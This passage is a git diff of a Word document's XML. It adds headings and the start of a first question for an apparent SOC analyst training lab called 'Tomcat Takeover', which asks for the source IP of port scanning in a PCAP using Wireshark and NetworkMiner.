--- a/SOC analyst lv 1/TEMP.docx
+++ b/SOC analyst lv 1/TEMP.docx
@@ -32,6 +32,52 @@
         </w:rPr>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Tomcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Takeover</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Lab</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -154,6 +200,34 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Network</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Forensics</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -193,6 +267,202 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Reco</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>nnaissance</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Execution</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ersistence</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Privilege</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Escalation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Credential</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Access, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Discovery</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Command</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Control</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -232,34 +502,77 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Wireshark</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>NetworkMiner</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
         <w:t>VIEWS LAB:</w:t>
       </w:r>
-      <w:hyperlink r:id="rId5" w:history="1"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>link</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -272,13 +585,4376 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Kịch bản:  </w:t>
-      </w:r>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Given</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>suspicious</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>activity</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>detected</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>web</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, the PCAP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>reveals</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>series</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>requests</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>across</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>various</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ports</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>indicating</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>potential</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>scanning</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>behavior</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Can </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>you</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identify</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>source</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> IP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>address</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>responsible</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
